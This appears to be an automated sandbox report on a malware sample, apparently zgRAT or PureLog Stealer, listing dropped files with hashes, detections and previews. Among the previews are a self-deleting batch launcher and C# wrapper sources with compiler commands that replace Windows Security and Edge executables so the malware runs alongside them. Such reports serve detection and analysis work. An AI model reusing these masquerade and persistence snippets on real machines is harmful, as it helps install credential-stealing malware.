SHA-512:	E20F0B8547C26B2F8403224C7735904089CFE454F444877214BD6BFBEA6D8CE3392F78D146C8721A273AFB3978D3CB68421DE851EFAC34C8ED8198302208E6FD
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER843E.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4609
Entropy (8bit):	4.432723489149381
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg771I9s/WpW8VYOYm8M4JoBFFVyq85Z8HzwVbd:uIjfTI7vu7VaJe/HsVbd
MD5:	6FECFDE7D2C5BF4F3CED0F9515A7E61B
SHA1:	CE28B2F543D79E49D70FEF56F82EAF883D54BB8F
SHA-256:	2CA4EF7B5C45881A8F9E87A5C8A2F71C2B05F5BFBE9F0D674964DF1C5A659FAD
SHA-512:	DCBCE84228B5953E3660019982815E225F1D55A255BCE680AB1705E67418FE7531DF2284D8B65E62A88585BB5F6E53DDE4F6D8229EF1EB8FA0D3C4D8761E2B72
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="523162" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rtcore64.exe.log

Download File

Process:	C:\Windows\Speech\rtcore64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Temp\LZthEGCsKS.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	5.1047258105293825
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1MERE2J5SMoF0CHovBktKcKZG1MERE2J5xAINhHKn:hCRLuVFOOr+DE1Fi23SMHBvKOZG1Fi2y
MD5:	5821B47AC09B53F2B781FCC638830A98
SHA1:	02B5D8E1C4D7326091D3F2EEB4744F8A12F3F2A6
SHA-256:	B9DF6B5491194A5ADAAD3CB49CED63C21359FD3C8767EA359404F8A5D93C35F5
SHA-512:	21E33346596CB34DAFB4A224DB10876A5F5B896C82832283DB365BCFDB8CAEEB5853A7A6BC1D62A81637CB372C642EBC3DB3251AD540E35938F78A89E2BFC947
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\winlogon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\LZthEGCsKS.bat"

C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	387
Entropy (8bit):	4.947738884355415
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLYZvlaiFkD:JNVQIbSfhV7TiFkMSfh0vl7FkD
MD5:	9FC95E52875036B80748A0672F987B36
SHA1:	5019FCFD3150060F4210F756B04BBBD14F8832D5
SHA-256:	EF397C42C88516DC5492B22E4C514E2F30664CFB6E45F2F6BB0CBF8A09588872
SHA-512:	3C2324B1E008D110CC7BA1B18215315F799C616476043BEB188913704564B41DF4D3DF69EBCEBF90C09F85857CC85DEA3F91D5A54A69A592D460E568C3B359AD
Malicious:	false
Reputation:	unknown
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\winlogon.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	249
Entropy (8bit):	5.1034088951181795
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oFi23fYY52Xi5tn:Hu7L//TRq79cQjZp2X0t
MD5:	4D5E30524337F81094409F935FE7AADE
SHA1:	51198FFA95D0CE622813A428F5F32D8E4F0B09C4
SHA-256:	20CAD606A68EED0B69B5A4184AA858B28F142CB54CA3091B4C44C101CEE73DCB
SHA-512:	8765D0228FE01C3B9D9AA721E95FF8B5CF128FB07AA5C4FF31959729043891652C0F597C501CB01EFA1E1BEC7C15CC2BA00D4EB743E68B20743A2A6BB402758D
Malicious:	false
Reputation:	unknown
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.0.cs"

C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (313), with CRLF, CR line terminators
Category:	dropped
Size (bytes):	734
Entropy (8bit):	5.262028468394333
Encrypted:	false
SSDEEP:	12:apI/u7L//TRq79cQjZp2X0oKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79t9pNoKax5DqBVKVrdFAMb
MD5:	0B119182273F9FEC876E5BDBC9F18831
SHA1:	238E948EE0EB949578F19BA4C44D9C7E52D6A168
SHA-256:	83F65A75F30667D75EB748744CF82E41180258D31C4CAEB40C7625C91EA34EF2
SHA-512:	CB1B4D7B6B6E199F9A4F5AA765EAB4667271B1E2B53E2F2E07AC3CE1F1255601B27566B2F109586217F7CDFCDA67CB4D1FDA8A1F184269EFABF5BCC516A72569
Malicious:	false
Reputation:	unknown
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\sx2Hbkvarp

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:gkpzMK:/B
MD5:	AEB8D51416B3B24BF7DB71352FE75727
SHA1:	24CB546A22B03DBF99A3FCA67CB53F375502141B
SHA-256:	DF1E5DB22E40DA5C41115E680EEC9F55D71F121F8FB14A6B6A149DBBE8712B08
SHA-512:	ACE270D734DA00623A8B8A0B1E66B37C703696E08D917DF9AFD00E3FE94F5B61A8F06846F6F2F048119D79E82F0FEFE26A946D1692C0029ABF82ABB28635BEF9
Malicious:	false
Reputation:	unknown
Preview:	jX2lsD6uWTmnxDpuKRDhMepx2

C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	4.973722722163131
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLYZvlaiFkD:JNVQIbSfhWLzIiFkMSfh0vl7FkD
MD5:	ED2F688C89C743CE85A8FBD438D9F2BC
SHA1:	9E1536A60CCAE9FC378D1F313A9080850310CFDC
SHA-256:	06C088E879C43EFE882DC3A7B36CD8473DE3058276095E249AB455A4A9D3E0E2
SHA-512:	DA7D478D48C3D5E14A8406481AC33DC0673E376294B39B665510C98326EEE8EE0FA61BC8E15674A29DDF02185975DDE561A1B2069120DD7BD5FF9F6D54AEA467
Malicious:	false
Reputation:	unknown
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\winlogon.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.163065519218824
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oFi23faGUuHn:Hu7L//TRRzscQjZiiHn
MD5:	6B77729FDAB667D15E9272A51F3E6C92
SHA1:	335A8979068EDBE6A1E5880E04067CC6B90A0B46
SHA-256:	49F5D076EFC88097030B8AEA0015E6E3DEBE36707993BD34537E272CF9162DFF
SHA-512:	D9CA209F696F4B4DF14F94788E3EE5D7EC08D99ADF7D20EA28B9F319E63F000D9A7012405D4CDE2A5D0C4535445E50CD11FAEF37B54BBB67460F53C69FD5E6F9
Malicious:	false
Reputation:	unknown
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.0.cs"

C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (328), with CRLF, CR line terminators
Category:	dropped
Size (bytes):	749
Entropy (8bit):	5.253807606650078
Encrypted:	false
SSDEEP:	12:apI/u7L//TRRzscQjZiiHuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzst9iKax5DqBVKVrdFAMBJj
MD5:	73D111B03ECB47207EC829FBD54562A7
SHA1:	21F5FD6D6F0D10C63EFF731321FA33ACC3CDB10D
SHA-256:	E847914522EA676EDBC27E1EE719ADB8CA42ADBA70F2521CDA8A08E896C0905D
SHA-512:	858316320D8FBBCAC4B92AF2A05D121D5E41A2F8DBC77C51864B944C4B149476D0A5ADB2844CB7F70898FCE81BDDD5D243DEE6B592BF0B771B5A9AD42F0B7B33
Malicious:	false
Reputation:	unknown
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\cc11b995f2a76d

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (508), with no line terminators
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.860735931453882
Encrypted:	false
SSDEEP:	12:yfUxAScATqH66vCVdMUZYWtSa4oJ5NUKpeamjB:yiqaIE5YWtSpoJ5NUK7mjB
MD5:	9056CD5D033B98BCF70E52E33DA2A0F4
SHA1:	6191797562E6085D4C7A84341C0B99F16077F822
SHA-256:	9D570DA3B67E286FA64BD3C5ADFD3384B566D8A49BFD712CCE44EF7CC45F372D
SHA-512:	B7CFDE71D3E1DC0BAF3F27BDF65669ED5C77C051ED2105DD5CE2B3DD77E2E1C1D10E5D1F6C8ADE118186BA91F64B421F2EF03CAC170C50CA5FDDFC64D7D190F2
Malicious:	false
Reputation:	unknown
Preview:	zpJ72CEj00pHMDJF21PlAfxzgQ30bMFVgHFpNZlKcnyGeBb1EDaxlIeT2TbmINHnvUlF8e1dPFIWqqVeyCvXwRuYmvw388BOgKVKaW2kM6ig9HnL86yFcu1dkNcMr8fRD30fVLEcJKLztNYfIl4BK5wvT1jM3q3NbQcGQHzx2W6RiBtWz7EGDdGHHEMel1idR7YduROBvHJy9eNSINX5lwJ7KV9M4VMAxc9lnQlhtDV6USIm14VXen1fyaSZSCGZ5JBgelp2mzMibMn1NWUAAyfKlexM7LPq75BLRlHPOdvoaTDlxbM5sFZGn159yc5akflfLbklPEvhC1tRbMZg9T81g4iapHbwhVD4shZV0kqnT2EvHoimCYaRgt9Q3K6Hn99qxyj3wEpZnViozwSBjyuJ5wY9hIbqniAU2Y7SFp08sAnLKVaG14izO0uBajVnm9vEVOvbyA637wa4INyMrUytAKFCn62fTMVtPiz6k9R18o1cZz2NvJ5RLCEK

C:\Users\user\AppData\Local\winlogon.exe

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\winlogon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\winlogon.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Users\user\AppData\Roaming\msvcp110.dll

Download File

Process:	C:\Windows\Speech\rtcore64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	564224
Entropy (8bit):	7.078525625168558
Encrypted:	false
SSDEEP:	12288:MF2Q7BSInp+aNY5x50MbSVYPXJ7xud0RoV:Mlp+yYX5pbaww0Ro
MD5:	451FD926F7D2920970013E3B17A7FD47
SHA1:	F5D3D0467DAE55689F311295D2E5B506A6F3D8F9
SHA-256:	2501E27B6F9BECE9926CD1E5BA631B084681D932AB30B0B79C5EE95ED8A61B2F
SHA-512:	57A5813DFEFC114A7544502EE83C2B09A009A0A2220315AE5A04E3F62CA657962166847943B5901700BB2749928124E70D17F74ED8A5E19A7A86D7085738D0E4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........PE..L......f...........!...&..................................................................@.........................P...x.......<...............................d... ...............................`...@...............P............................text............................... ..`.rdata..fj.......l..................@..@.data..............................@....reloc..d...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\ITDiARjW.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MQshNARH.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QGjYUwSA.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\XEXXxLMp.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oLoCRyrD.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
